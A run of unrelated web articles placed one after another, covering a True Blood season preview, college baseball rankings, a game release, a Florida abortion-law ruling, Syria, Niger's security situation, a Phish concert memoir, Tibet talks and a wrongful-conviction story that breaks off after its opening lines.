HBO thrives off smart political dramas . With The Wire really setting the standard of well-scripted local government politicking , HBO has now become even more directly relevant with shows like The Newsroom , Veep , and , the TV movie , Game Change . True Blood is keenly aware of current social politics and uses them as a backbone of satirical allegory to accompany the lusty , soapy drama that is at the bloody heart of the show . Of course , the vampires have always been presented as a metaphor for the gay community 's struggle for equal rights with the story initiated by vampires ' decision to “ come out of the coffin , ” thanks to the creation of a synthetic blood substitute that allowed them to present a non-threatening persona towards humans .
The parallels are well-applied in the early seasons . From the small scale of rooting for Bill and Sookie ( Anna Paquin ) to be allowed their happily ever after by the government allowing equal marriage rights , to the larger plot created in season 2 of a fundamentalist Christian group targeting the vampire community . Alan Ball 's concept for this last season 5 , however , was a bit more ambitious , but unfortunately , less fleshed out , as well . After four seasons of building up to the almighty Vampire Authority , the eventual reveal is quite a let down . It 's a small group of bickering , manipulative vampire politicians maintaining a balance between the necessary public image and controlling a faction of religious zealots .
While I understand the desire to maintain political metaphors , it 's not worth sacrificing some realm of sense for the characters and creatures that the show revolves around . First of all , these are immortal beings . On some level , their version of government really should have the gift of long-term thinking and a bit more sophistication than that of humans who are limited by our own short-term mortality . Secondly , these are still vampires . A group of beings far more powerful and mysterious than simple humans . Such a group would theoretically require a whole next level of strength and political intrigue to dominate . The metaphorical vampire government of season 5 lacks the delicate innerworkings of government that could have given the story authenticity , as brilliantly executed in The Wire . The zealot group commentary was a bit too abstract and overloaded with vampire exposition to truly be relevant . Not to mention , the fact that this government is so thinly held together , that the entire group is essentially dissolved in one season thanks to the introduction of our two vampire heroes , Bill and Eric . Luckily , this dissolution leads into a very exciting premise for season 6 .
2 . The War Needs to be Affective
The promos for the new season are amping it up to be an all out throwdown between vampire and human kind with the direct taglines , “ War Is Coming ” and “ Blood Will Spill. ” After Bill essentially bought into the anti-human vampire religion during season 5 , he thought up the catalyst to destroy the last vestiges of the human-vampire goodwill that still remained ; destroy the true blood facilities . Eric then “ eviscerated ” any chances of negotiations with a U.S. General representative . Now , all vampires will have to show their fangs and humans will likely resort to fear and extreme measures exasperating the divide between the two groups . This is the perfect setup for the new showrunner , Brian Buckner , to really make his mark in the True Blood world , though he 's sure to face quite a few challenges .
One of the most important struggles , narratively speaking , will be applying this war driven storyline directly to our characters in a large scale sort of way . The previous seasons have all had the advantage of being firmly grounded within Louisiana with a few trips to Dallas , TX and Jackson , MS thrown in occasionally to branch out a bit . National politics were merely references through witty news bits or propaganda pieces . The scope of an all out vampire war , while still following our usual leads , is going to have to demonstrate the ripple effect on all characters within the True Blood universe and the background world that they live in . If Bon Temps , LA is the epicenter of the vampire war , then I hope to really see the choices Bill , Sookie , Eric and co. make have large scale ramifications . In this Rolling Stone interview with Buckner I found myself particularly encouraged that the writers are trying to refocus on the human aspects of the characters and the value of life . That 's a great way to reconnect with audiences .
Bill is sure to be the key player in the war this season after last season 's finale transformation into a godlike version of himself . He 's a loose canon at this point , but seeing as how every season essentially finds a resolution to its A plot , I expect he 'll return to some form of the “ good guy ” by season 's end . Either way , his evolution as a player in this war is something to look forward to . The show is definitely treading new ground as Bill more or less fell into the catalogue of supporting characters by this point in the book version timeline . As I mentioned previously , though , the show 's at its best when storylines manage to interweave , and so ultimately a vampire war seems like a great plot tool of large scale inclusion for all relevant characters .
1 . Dig Into the Fairy Story
I 'm on the fence about the fairy situation . After the revelation in season 3 about Sookie 's fae lineage , True Blood has been giving viewers cryptic ( and often silly ) scraps of information about the fairy race . This has been a good strategy really ; if they 're such a secretive group of beings , then there 's no reason for our heroine to immediately discover all of her origins . Plus this is a supernatural that has n't really had much of a voice in modern vampire lore . Slowly building the importance of the fae influence while letting them linger in the background has allowed other more pressing storylines to remain relevant and will ultimately make the fae 's full introduction feel like a natural step . It 's time for that step to be taken .
My doubts on this topic primarily stem from how the bits we 've seen have been handled thus far . Season 4 opened with Sookie having been abducted to a fairy utopia and discovering some elements of the ongoing war between the different factions . This 15 minute opener carried almost no relevance to the rest of the season , and only a dash to the following season 5 . It was a disorienting way to begin , and while that may have been the intention to create emotional shifts in the main characters , it became a challenge to reengage with the new narrative directions . Everything about the fairies has been challenging to engage with so far ; they 've been treated as magical oddities as demonstrated in last season 's end with Sookie 's dialogue with one of the elder fairies . All this strangeness is not necessarily bad , maybe it 's right to feel the need to adjust to such a new interpretation of a magical race . However , it does , once again , walk down the path of needing a balancing payoff . Going by the Stackhouse novels , the fae turn out to be the most dangerous and powerful group of all . They eventually drag their own political war into our world , which is one of the stories I 'm most excited to see carried out . This will be a good goal to build towards for next season .
My hopes , concerns , and speculations aside – I 'm damn excited about the upcoming season . While there have been some letdowns recently , True Blood is still a fast-paced drama that flourishes by taking risks and , of course , delivering a healthy dose of gore and sex on a weekly basis . I think getting back on track will be an easy step with the elements that have been put into to play and cautiously built upon season by season . There 's certainly plenty to look forward to !
What do you think ? .
The top three stay the same in this week 's Power Rankings as Virginia , Cal Poly and Florida State all held court this week . But the SEC East accounted for some turmoil , with Vanderbilt and South Carolina each dropping a series on the road this weekend . Yes , once again , venturing from the home confines proves to be a speed bump to anyone who dares .
Now on to who 's hot and who 's not in the Power Rankings .
1 . Virginia ( 27-5 )
Trending :
Last week : 1
Of note : You want the Cavaliers in a microcosm ? Check out this past week , when they posted three shutouts , including Nathan Kirby 's 18-strikeout no-hitter against Pitt . The offense hit just .198 versus the Panthers , though .
2 . Cal Poly ( 26-5 )
Trending :
Last week : 2
Of note : Good series win over Central Coast rival UC Santa Barbara , but the concern is over staff ace Matt Imhof , who left Friday 's 8-6 loss early with an apparent lower back injury .
3 . Florida State ( 26-5 )
Trending :
Last week : 3
Of note : A pair of near-misses versus Notre Dame raises some concern . So does Jameis Winston 's eight-pitch , two-hit , two-earned run performance . He also went 0-for-9 last week .
4 . Oregon State ( 25-6 )
Trending :
Last week : 6
Of note : How stingy are these guys ? Stanford could muster only two runs in 31 innings against Oregon State 's steady pitching and defense , and was held to a .203 average in the process .
5 . Louisiana ( 30-3 )
Trending :
Last week : 7
Of note : The Cajun juggernaut is in full swing as Louisiana totaled 53 runs in four games . It also features the 11th-best offense in the country with a .310 team average , and are second in home runs with 34 .
6 . Houston ( 25-6 )
Trending :
Last week : 8
Of note : The Cougars dodged rain drops and upsets in a 2-1 weekend versus Rutgers to open the road portion of American play . More importantly , Houston leads the country with a miserly 1.56 team ERA .
7 . Vanderbilt ( 25-8 )
Trending :
Last week : 4
Of note : Just 6-6 ? Really ? Odd to see the Commodores are an even .500 in SEC play . Vandy gave up 17 runs in two losses to close the road trip to Tennessee this past weekend . Yikes .
8 . South Carolina ( 26-5 )
Trending :
Last week : 5
Of note : In losing two of three at Arkansas , the Gamecocks hit just .168 and the defense committed more errors ( seven ) than the offense had multibase hits ( three doubles ) .
9 . Texas ( 26-7 )
Trending :
Last week : 10
Of note : The Longhorns are certainly hitting their stride here midseason , having won 11 of their past 12 since that series loss at home to Kansas in mid-March .
10 . Washington ( 22-6-1 )
Trending :
Last week : 12
Of note : What a white-knuckle Game 3 versus Oregon . The Ducks scored twice in the top of the 10th inning , only to see the Huskies load the bases and get Andrew Ely to clear them with a walk-off double .
11 . Oregon ( 22-10 )
Trending :
Last week : 9
Of note : This team probably should n't have dropped that far since that road series loss at Washington was this close to going Oregon 's way , as Sunday 's epic 10-inning battle showed .
12 . LSU ( 24-8-1 )
Trending :
Last week : 16
Of note : Wow . Big-time sweep of Mississippi State . That could be a season-turner for the Purple and Gold . But a hot and hungry Arkansas team comes to town next . No time to let up .
13 . UNLV ( 22-9 )
Trending :
Last week : 14
Of note : In their three wins this week , Rebels pitching gave up just 14 hits and struck out 26 . Big Friday mound stud Eric Fedde is eighth nationally with 61 K 's in 57 innings .
14 . Louisville ( 23-8 )
Trending :
Last week : 13
Of note : Things get a little more serious as the Cardinals go on the road the next two weeks at Houston and UCF . The Cards love pressure , having stolen 70 bases , second-best in the country
15 . Oklahoma State ( 22-10 )
Trending :
Last week : NR
Of note : The Pokes ' 160th-rated schedule has not been kind to their RPI . But West Virginia , Kansas , Texas , Arizona State , K-State and Oklahoma will close out the season .
16 . Alabama ( 22-9 )
Trending :
Last week : NR
Of note : The Tide now own weekend wins over Kentucky , Ole Miss and Texas A & M in the last month , boosting their profile . Do n't you know Auburn would love to knock them off this week .
17 . Kentucky ( 22-10 )
Trending :
Last week : NR
Of note : Nobody is having a better year than the Big Blue 's A.J . Reed . The two-way star is second nationally with 12 homers , is hitting .377 and is also 6-1 with a 1.93 ERA . Spell `` stud '' with all caps here .
18 . Rice ( 22-12 )
Trending :
Last week : 11
Of note : Is this the last saving grace for the Owls ? Well , despite their recent struggles , the strength of schedule is still ranked No . 21 overall , so do n't jump off the cliff yet .
19 . Texas Tech ( 24-11 )
Trending :
Last week : 17
Of note : Tough series loss at Oklahoma State . But the bigger picture is the Red Raiders have still won only one Big 12 series this season . The RPI is at No . 17 right now , so all is well , right ?
20 . UC Santa Barbara ( 20-7 )
Trending :
Last week : 20
Of note : Had a great win over Cal Poly ace Matt Imhof on Friday , chasing him in the fourth inning . But the Gauchos ended up losing two of three in Big West play for the second week in row .
Five on deck : Tennessee ( 21-9 ) , Pepperdine ( 24-7 ) , San Diego State ( 24-8 ) , Kansas ( 21-11 ) , San Diego ( 22-9 )
Update : Oddworld : Stranger 's Wrath has been released on the Play Store , and glory be , it looks like it 's not exclusive to anything . You can download it now on any Android 4.0 or higher device , and the Play Store version has the same external controller support and $ 5.99 price tag . Thanks to commenters step_jac and Amarus Kh for letting us know .
Update again : It looks like Stranger 's Wrath is compatible with Android TV as well . Nice .
--
The Oddworld series is one of the hidden gems of gaming : it 's never been a blockbuster in terms of sales , but each game is utterly unique and brings innovative elements across setting , story , aesthetics , and gameplay . Stranger 's Wrath was first released as an Xbox game ( that 's the original Xbox , kids ! ) back in 2005 . It 's since been re-released on a few platforms including the PC and iOS , and now it 's come to Android .
Trailer is from the iOS version of the game .
Well , sort of . You can only buy Oddworld : Stranger 's Wrath on the Amazon Appstore , and based on the device compatibility and the initial reviews , you 'll need a Kindle Fire HD or later Amazon device to actually play the game . This is , if you 'll pardon the pun , odd : the last we heard of the mobile version of Stranger 's Wrath , it was set to be an exclusive for NVIDIA 's SHIELD Tablet , along with Strike Suit Zero and Pure Pool . Why publisher Oddworld Inhabitants decided to switch to Amazon , and apparently sometime in the last month or so , we could n't say .
In any case , Stranger 's Wrath is a 3D action-adventure title in which you play the titular Stranger , a bounty hunter who looks like a cross between Chewbacca and Clint Eastwood . The perspective shifts from third-person for travel and platforming sections as you track down bounties , into first-person for shooting the game 's unconventional weapons ( including a crossbow that fires slugs , bees , and exploding bats ) . The Android version relies primarily on on-screen controls , but support for standard external controllers is included .
The Oddworld universe is one of the most unique in gaming ; I imagine it as what you 'd get if they let Guillermo del Toro direct a Pixar movie . Just checking out the various sights would be enough for me to shell out the $ 6 asking price , but I do n't have anything that 's compatible with it . We can but hope for a wider Play Store release soon .
Amazon Appstore - Oddworld : Stranger 's Wrath
A federal judge in Tallahassee has temporarily stopped enforcement of parts of a new state law on abortion .
U.S. District Judge Robert Hinkle issued a preliminary injunction late Thursday — one day before the new law was to take effect .
His order also came the same week the U.S. Supreme Court struck down a similar Texas law that clamped down on abortion access because it “ unduly burden ( s ) ” women 's reproductive rights .
Hinkle referred in passing to Whole Woman 's Health v. Hellerstedt in his 25-page order .
Planned Parenthood affiliates in the state sought the court order to prevent the Florida law 's enforcement .
They are challenging three elements of the law : Its defunding of their groups , a required annual inspection of half of its abortion patient files , and a redefinition of fetal trimesters , according to Laura Goodhue , executive director of Florida Alliance of Planned Parenthood Affiliates .
On the defunding and file inspection provisions , Hinkle preliminarily found Planned Parenthood plaintiffs were “ likely to prevail on the merits of their challenge . ”
The state 's defunding of Planned Parenthood is “ squarely on the unconstitutional side of the line , ” Hinkle wrote .
“ The defunding provision has nothing to do with the state and local spending programs at issue , which address things like testing for sexually transmitted disease , ” he wrote . “ The defunding provision is instead an effort to leverage the funding of those programs to reach abortion services .
“ Nobody has contended that the plaintiffs have done anything in connection with the publicly funded programs that is inconsistent in any way with the goals of those programs , ” he added . “ The state 's only beef is that the plaintiffs provide abortions . ”
Hinkle also likened the file inspection provision to a search without a warrant , which the Constitution allows in some cases , “ but only when the government makes available an opportunity for pre-enforcement review of the official 's demand to see records . ”
“ Here , the state apparently has not made available an opportunity for pre-enforcement review , ” he wrote . “ This , standing alone , renders the state 's system facially unconstitutional . ”
As to the redefined trimesters , Hinkle noted the difference in licensing for abortion clinics , in which abortions performed at a later stage in pregnancy require stricter regulations .
The new law redefines the first trimester from starting at the mother 's last menstrual period to beginning at “ fertilization. ” But Hinkle said that does n't change the math for determining what kind of clinic can perform a later-term abortion and denied relief on that issue .
Under federal court rules , the Planned Parenthood plaintiffs have to pay a $ 5,000 bond by July 7 . Otherwise , the “ injunction will remain in place until entry of a final judgment in this action or until otherwise ordered . ”
The “ order addresses the issues based on the record as compiled to this point and reaches legal conclusions based on likelihood of success , ” Hinkle wrote . “ This is not a final judgment on the merits . ”
Syrian President Bashar Assad has the upper hand in Syria now that Russia has stepped up its military campaign in the country and Iran has sent more pro-regime troops to fight , Pentagon officials said Tuesday .
`` The balances of forces are now in Assad 's advantage , '' Gen. Joe Dunford , chairman of the Joint Chiefs of Staff , said in an Armed Services Committee hearing Tuesday morning .
Dunford and Secretary of Defense Ash Carter said in the hearing that although Assad has in the past month gained a significant military advantage in Syria , the U.S. has a priority of defeating the Islamic State group , not the regime .
Assad has overseen the killing of hundreds of thousands of people since 2011 when the revolution began and for more than four years the U.S. has maintained the position that there is no future for Syria as long as he is president . But following the Russian military intervention in Syria last month , the rhetoric within the administration changed . Officials no longer denounced Assad as a dictator or tyrant . Instead , both Secretary of State John Kerry and President Obama said the U.S. is willing to work with Assad 's allies , including Iran and Russia , to find a way to end the conflict .
So far the U.S. has held meetings , at least publicly , only with Russian officials , including Foreign Minister Sergey Levrov . That interaction has angered rebels inside Syria that are being armed by the U.S. but bombed by Russia . Last week , rebels in Aleppo told International Business Times in a series of interviews that Russia was deliberately targeting them , especially in the countryside , and the Islamic State group was gaining ground as a result . The introduction of Iran into the diplomatic mix would only escalate those tensions and could also anger U.S. allies in the Persian Gulf .
On Tuesday , regime forces gained ground in the Aleppo countryside , where rebels armed by the U.S. are battling Assad and ISIS . Russian forces also hit several targets in Hama , a city just south of Aleppo where the United Nations said this week thousands of people have been displaced .
Jessie J & Robin Thicke Are Calling All Hearts Together On Her New Album Alive !
Jessie J will release her new album Alive next month , but the British songstress won├óΓé¼Γäót be solo on all the new tracks .
The Wildster will make some sweet music with none other than Robin Thicke !
Seems only appropriate for the Do It Like a Dude singer to go voice to voice with North America├óΓé¼Γäós new warrior for women !
Jessie and Robin have teamed up for a track called Calling All Hearts . Yes , we know — it sounds like a song we├óΓé¼Γäód expect more from Carrie Underwood than Jessie J . ( Love ya , Carrie ! )
But if it├óΓé¼Γäós anything like the first single from Alive , It├óΓé¼Γäós My Party , we ain├óΓé¼Γäót complaining ├óΓé¼╦£cause Mamma Jessie J Knows Best what our ears and feet need !
Can├óΓé¼Γäót wait for the full listen !
[ Images via BauerGriffinOnline/David Bodrick/WENN . ]
Share
Long gone are the days of indie filmmakers blowing half their budget on a helicopter for that all-important aerial shot . Quadcopters are where it 's at , their flying and camera capabilities now good enough for capturing incredible footage that can wow audiences – subject to the director 's artistic vision and flying skills , naturally . Tim Cash , a filmmaker from Bend , Oregon , has been using the technology for around a year now and although music videos are his specialty , he recently had the chance to include some carefully crafted drone shots in his debut feature film , which lands this summer .
DT got in touch with Tim to find out more about how drones have helped take his work to a whole new level , and about his experiences with the technology along the way .
How long have you been using drones in your work ?
“ They 've brought production values way up . ”
What impact have they had ?
They 've brought production values way up . Always going for the bigger-than-life look .
What are the biggest challenges for you when it comes to filming with a drone ?
Well , I would have to say the attention it brings . When shooting with my camera crane I get looks and interest but once they see this thing hovering , then flying over the ground at 60 mph , people get interested real quick . Mostly because they 've never seen anything like it . I personally like to stay below the radar but drones just bring you more attention . And then there are the legalities . That 's all still happening , so we 'll see where things go in the next couple of years .
How much training did you need to get proficient at flying the drone ?
Not much at all . I 've been flying for a year and have about 200 hours in the sky . I have experience operating a crane with a camera on the end , which involves similar controls . That said , I 'm still learning and the camera moves only keep getting better and more intricate .
What kind of mistakes did you make early on when using drones in your work ?
Well , I 'll start by saying , “ These things can be dangerous ! ” I started flying with a huge fear of hurting someone or damaging the craft itself . In all it costs around $ 4,000 for everything , so sending it to the ground is not an option . I 'm a very conservative flier and safety is always the top priority . When I first started piloting , I experienced a few near-fly-aways at 200 feet ; I had to fight with the controls to rectify the problem and it was scary at the time .
Before drones , how would you get aerial or elevated shots ?
“ Advice : Do n't crash it into people and ruin it for the rest of us ! ”
On one particular shoot a few years back , I used a helicopter . The pilot and the chopper , plus the cameraman , camera , and gimbal , cost over $ 3,000 for less than an hour in the sky . And you ca n't get a helicopter nearly as close . I also have a 20-foot camera crane which has set me apart from most of my competition . So I 've been doing flying shots for a while … just not without strings .
Drones produce such stunning footage that it must be hard to not use them during an outdoor shoot ?
I 've always been a variety guy . There 's a lot you can do with a drone but the trick is definitely not to overuse them . In the right situation they can set up a scene or add some serious action to another . We just released a trailer ( below ) for The Astronot movie , which has quite a few drone shots in it but we 're trying to get butts in seats so we really wanted to wow them with some cinematography right out of the gate !
Could you tell us something about that gorgeous sweeping drone shot at the start of The Astronot trailer ?
Ha ! Yeah , when it comes to flying the drone , I 'm a send-the-bike-down-the-road-and-get-as-many-shots-as-I-can-while-the-bird-is-in-the-air kinda guy . I did n't really know what I was getting until I saw it in the monitor , then it was all about the dance with the bike – keeping it smooth and keeping the bike framed artistically , all the while flying a multi-rotor aircraft . The second part tends to leave your mind especially when you have a wide-open area to fly in with no obstacles . When I have to fly around or through things , that 's when my heart palpitates .
Below : One of Tim 's music videos using drones , and drone shots , as part of the story :
What improvements would you like to see made to the currently available remotely controlled copters ?
It 's already happening – better camera ! They just released a new camera for the Inspire 1 with a great big sensor and it shoots RAW . I 'll probably upgrade to it sooner than later .
And finally , what advice would you give to filmmakers looking to include drone photography in their work ?
Do n't crash it into people and ruin it for the rest of us !
When Agadez 's army barracks was hit by a suicide explosion on May 23rd the Nigerien bad dream seemed like it had finally come true . For many Nigeriens it has been a case of when rather than if the crisis in neighbouring Mali was going to affect them . Niger 's long porous borders and poor military capability make it almost impossible for the government to guarantee the country 's security , and its recent tough stance on Mali – sending in around 500 troops and openly offering their support to the US and France in the battle against the terrorists – has made them a target . In fact , a statement issued shortly after the twin attacks on Agadez and the French uranium plant at Arlit by Mokhtar Belmokhtar 's Signed in Blood Battalion ( which claimed joint responsibility with Mujao ) specifically refers to Niger 's co-operation with France as the reason for the attacks .
Niger has long been threatened by Al-Qaeda in the Islamic Maghreb ( AQIM ) and its affiliates whose members have been moving through the extreme north of the country for several years . A small number of Nigeriens have been named among the ranks of the MUJAO which came to prominence in northern Mali in 2012 – hardly surprising as their main base during the brief Islamist take-over was Gao , close to the Nigerien border . According to a local Nigerien journalist , the government is aware of the presence of other militants in the capital and the Tillabery region .
However , until the Agadez/Arlit attacks the focus of these militants ' attention was Mali ( where AQIM had established bases ) and the main problem had been kidnapping for ransom . In late 2008 the Canadian diplomat Robert Fowler , who was acting as the UN Secretary General 's special envoy to Niger , was kidnapped about 45 kilometres outside of Niamey , and in 2010 seven employees of Areva were seized by armed groups from the Arlit facility ; four of them have never been seen since . France appears to think they are being held by a group of Islamists whom they chased into the Adrar des Iforghas Mountains in neighbouring Mali .
In January 2011 two young Frenchmen were seized from a bar in down-town Niamey by turbaned men and driven off towards the Malian border ; the subsequent French operation to rescue them ended in their deaths . The latest round of paranoia erupted when the mainly-Tuareg MNLA rebel group lumbered into northern Mali in early 2012 with the spoils of war from Gadaffi 's overthrow . Niger breathed a sigh of relief as its own ethnic Tuareg population chose not to rebel – when the jihadists were ousted from northern Mali it seemed only a matter of time until they would turn their attention back to Niger 's vast deserts .
The question remains as to how much local support these “ ˜foreign ' groups attract . President Mahamadou Issoufou has been at pains to distance Niger from the attacks , asserting that the Agadez attackers “ came from Libya ”  . This chimes with President Idriss Deby Itno of neighbouring Chad 's claim that militias are training in southern Libya intent on overthrowing his government . “ It is less problematic for local governments to describe terrorist networks as foreign movements ”  says one Sahel analyst .
There are suggestions of local complicity in the twin Agadez and Arlit attacks and a jail-break in Niamey several days later in which between 12 and 22 high risk prisoners escaped from the central prison . The investigation into Agadez has suggested at least one Nigerien was involved with the militants . Surviving soldiers described a Hausa-speaking beggar who had turned up outside the barracks and begun washing clothes and praying with them in the weeks before ; according to military sources he was seen firing on soldiers during the fighting .
Niger 's Justice Minister Marou Amadou described how before the Niamey prison break “ weapons had been smuggled in ”  and local newspapers have been quick to join the dots following the dismissal of the prison 's warden . Nigeriens have been asking why the man at the centre of the jail-break – the Malian-born Cheibane Ould Hama , an Arab from Gao who was convicted in 2009 of killing four Saudi Arabians and a US citizen – was not being held at the high security facility at Koutoukale outside the capital .
Cheibane had already escaped from jail in Bamako in an audacious plot several years earlier . He was mentioned in a US diplomatic cable seen on Wikileaks for suspected involvement in the 2008 Fowler kidnapping , allegedly handing over Fowler and his deputy to AQIM , although it 's not clear whether he was actually ever a member . This follows a pattern that was seen at the time of local criminal gangs being responsible for much of the hostage-taking and then handing them over to AQIM for cash .
Issoufou 's strategy appears to be to ask the international community for help against the Islamist threat while portraying Niger as a bulwark against the chaos seen in Mali . So far it appears to have paid off – France has already offered helicopters and a number of soldiers to assist Niger 's army , including troops who were involved in releasing the last of the hostages taken in the Agadez attack . But it is a risky strategy – agreeing to the US using his territory for a new drone base for surveillance in Mali may increase the chances of further attacks by the Islamist militants .
The same can be said for Idriss Deby Itno 's role in sending troops to Mali , although any attacks in Chad may well be co-ordinated with the help of Boko Haram groups in northern Nigeria due to the vast distances between AQIM and Mujao 's operations in Mali and Chad . Both men need to be wary of crying wolf ; “ Overestimating the threat in order to attract more assistance may be a dangerous bet ”  says the Sahel analyst .
Real questions remain about Niger 's capacity to contain the problem . Measures to register licensed weapons look ineffective in the face of the sheer number of illegal weapons in the region post-Gadaffi . The armed forces are only estimated at about 5000 men at best ; checkpoints and barricades have been erected across Niamey but may not be enough . For many in Niger this could be the beginning of the bad dream everyone hoped they could avoid .
Celeste Hicks is a freelance journalist with a focus on African issues . She has a particular interest in the Sahel .
This slideshow requires JavaScript .
I could n't let the the 20th Anniversary of the first Red Rocks show go by without a quick post . Spring of '93 had some great shows , but when we saw Red Rocks on the docket for the summer , we were overjoyed . As most are aware , Summer '93 was a breakthrough tour and the Red Rocks show is one of many highlights from what still proves to be one of the high marks of the band 's career . I was able to catch the first three shows of the tour , plus Stowe , Jones Beach , Darien Lake , Wolf Trap , Chicago and my birthday show ( Kentucky ) but due to moving out to California at the exact same time , I was n't able to see as many of the shows as I would have liked . In hindsight , missing the Murat is the one I regret most . Every show from this tour has something killer to offer , but everyone was looking forward to Red Rocks as the show of the summer , and it did n't disappoint .
We got to Denver a day or two before and set up camp at my friend Randy 's house in Boulder . This house had been our home base for all the Colorado shows since '91 . I had never been to Red Rocks before and so we went mountain biking around there the day before the show . Riding around the surrounding area got us even more stoked ! We woke up on show day and it was pouring . Ugh . We kept listening to the radio as the show was rumored to be moved over to McNichols Arena due to the rain . Fuck . Still , with no word from the radio or otherwise , we made our way over to the venue around 2PM . It was still gray skies and off and on rain . We pulled in and parked and even though this was the show of the summer , there was a little ticket shack in the parking lot still selling tickets 3 hours before showtime . That 's probably the last time there were tickets available at Red Rocks on the day of . We walked all around meeting up with folks and trying to stay dry and got to hear the soundcheck which was cool . I do n't remember any songs being played but I remember Page trying out all these really cool synth sounds , some that I still have not heard again to this day .
Finally it was time to head in . We had a group of about 10 of us and we walked in with a giant tarp . We were in pretty early ( there was no “ mad dash ” back then ) and we walked to just behind the soundboard and claimed our space . At this point it was POURING and windy so we made a shelter with the tarp and we all sat underneath it and hot boxed for like an hour . It was all we could do . Finally we got word that the show was indeed going on as planned :
Set 1 : Divided Sky , Harpua , Poor Heart > Maze , Bouncing Around the Room > It 's Ice > The Wedge , Ginseng Sullivan , Rift , Run Like an Antelope
Set 2 : Also Sprach Zarathustra > Slave to the Traffic Light > Split Open and Melt , The Squirming Coil , My Friend , My Friend > Chalk Dust Torture , You Enjoy Myself > Purple Rain > Hold Your Head Up , Cavern
Encore : The Mango Song , Free Bird
As the opening notes of Divided Sky rang out , the skies parted and there was not single drop of rain for the rest of the show . It 's an amazing version and everyone was in a state disbelief at the beauty of the venue . The always welcome Harpua was trotted out in a rare second song slot and when they got to the “ Look ! The storms gone ! ” line , the crowd gave a collective cheer . This show was full of energy from start to finish . I am not sure how much of it translates to tape but the place was just going off . I felt like I was hanging on to the back of a rocket ship for the whole show . There is great playing throughout . The Wedge is one of my all-time favorite versions and was fairly rare at the time having not been played at all on this tour ( and not again for another 2 years ) . The 4th ever version of Ginseng Sullivan was also great , once Trey got his guitar in tune ! The Rift and Antelope ( listen below ) was a solid way to close the set to say the least . The band was obviously loving the venue as much as we were .
The mood during set break was festive and everyone was soaking up the atmosphere and tripping out on the lightning storms we could see over Denver– still , the weather was holding out for us . The band came back on to open the set with 2001 which had debuted earlier in the tour and was already a crowd favorite . This is a short and funky version that leads into my personal highlight of the show , the Slave . An all-time version , this track had eluded almost everyone and was recently brought back the previous week at the Cincinnati Zoo . I had seen almost 125 shows up to this point and had only seen one Slave so I was DYING for it . When they dropped into it from the 2001 , I was as happy as I have ever been at any show . It was true moment of bliss . They nail the version too . The rest of the show is great and has some amazing moments but the Slave was really where it peaked for me personally . The YEM > Purple Rain is very , very good and I even liked Cavern on this night . It was one of those shows that they could have come out and played only Cavern and it still would have been amazing ( in my opinion ) . Free Bird sent everyone into the night , giggling down the stairs in amazement of what we had all just experience . This first visit to Red Rocks is a true highlight of all the Phish shows I have seen and I would easily put it anywhere in my Top 10 .
Not too long after the shows , maybe in the Fall , a very low gen soundboard popped up . The board is a little sterile in my opinion and does not convey spaciousness of the venue but it was still pretty crisp and we were happy to have it . An MP3 download of that can be found here : http : //www.mediafire.com/ ? 8et51aqmw8yob Lossless here : http : //bt.etree.org/details.php ? id=562929
For years and years I tried to track down an audience version of this show without success and I always attributed it to all the rain and wind and figure nobody got a good pull . Well , one B & K source did finally pop up in the last few years and it is surprisingly good . I think a matrix of the two sources might be a winner if someone took the time to do it . The audience source is my personal choice , and it can be found here , in lossless : http : //bt.etree.org/details.php ? id=551745 Sorry , no MP3 link for that one .
Even the flatness of the soundboard ca n't tame this Antelope : https : //backinmydaydotnet.files.wordpress.com/2013/08/i-10-run-like-an-antelope.mp3
NEW DELHI ( Reuters ) - Senior envoys of the Dalai Lama are traveling to China to meet the government over the crisis in Tibet , the government-in-exile said on Friday , only three months before the Beijing Olympics open .
Tibetan spiritual leader Dalai Lama speaks during a news conference for Tibetan Lamas and religious leaders in the northern town of Dharamsala , May 2 , 2008 . REUTERS/Stringer
After a crackdown on protests against Chinese rule in Tibet , an international diplomatic chorus earlier this year urged dialogue with the Dalai Lama . Beijing abruptly announced in late April that it intended to meet his aides .
“ During this brief visit , the envoys will take up the urgent issue of the current crisis in the Tibetan areas , ” the government-in-exile said in a statement on its website .
Shen Kaiyun , the deputy director of the official government information department in Tibet , said he supported the Chinese government 's move to talk to representatives of the Dalai Lama , but expected the spiritual leader to back his non-separatist words with deeds .
“ As early as 1978 , Deng Xiaoping said it was not too late to let bygones be bygones , so our policy is consistent , ” Shen told Reuters in an interview in Tibet .
“ But we have pre-condition — that is being patriotic . I hope the 14th Dalai Lama will back up his words with deeds . ”
Tibet has become a flashpoint for anti-China protests that have disrupted the Olympic torch relay around the world and has led to calls for state leaders to boycott the Beijing Games , which open on August 8 .
The talks will be the first since violent protests broke out in Tibet in March . It was not clear where they would take place .
Some experts say the meeting will achieve nothing . There have been six rounds of dialogue between China and the Dalai Lama 's envoys since 2002 with no breakthrough .
“ China 's main objective is the successful completion of the Olympics , ” said Brahma Chellaney of the Centre for Policy Research in New Delhi . “ These talks are just a public relations exercise . ”
EXPERIENCED ENVOYS
The two envoys are due to arrive in China on Saturday for what the Tibetan side called “ informal talks. ” The envoys , Lodi Gyaltsen Gyari and Kelsang Gyaltsen , are both senior and experienced representatives of the Dalai Lama , experts say .
“ We are hopeful that the Chinese are willing to address the Tibet issue realistically , ” Tenzin Taklha , a spokesman of the Dalai Lama , told Reuters from India , where the self-proclaimed Tibetan government-in-exile is based .
Despite the offer of talks , China has accused Tibet 's exiled spiritual leader , who fled Tibet after a failed 1959 uprising against Communist rule , of manipulating opinion and governments in the West .
China has blamed the exiled Buddhist leader 's “ clique ” for unrest in Lhasa and other Tibetan areas , which it says was aimed at upstaging the Olympic Games .
The Dalai Lama says he is campaigning for autonomy for the strategic Himalayan border region . But China , which says it sent troops in 1950 to Tibet to liberate the country from feudal serfdom , says he is bent on independence .
Some analysts said they may be a chance for some progress with the talks .
“ Both sides know there is nowhere to go apart from talks , ” said Prof. Mira Sinha Bhattacharjea , emeritus fellow of the Institute of Chinese Studies in New Delhi .
“ And with the Olympic Games coming , China will be a little more anxious for them ( the talks ) to help . ”
The Olympic torch was run through Hong Kong on Friday , in a festive return to China after protests in other cities across the world . But tensions flared again as patriotic crowds heckled protesters and police briefly detained eight demonstrators .
During the 15 years that Floyd Bledsoe was wrongfully imprisoned , he had plenty of time to think about the murder of 14-year-old Zetta “ Camille ” Arfmann .
Who really did it ?
Was it his brother , Tom Bledsoe , who initially confessed in 1999 and then recanted ?
Did the killer act alone ?
There was one name , however , that he never considered .
Last fall , when Floyd saw a report with the results of newly tested DNA , he was n't too surprised that the results incriminated his brother .
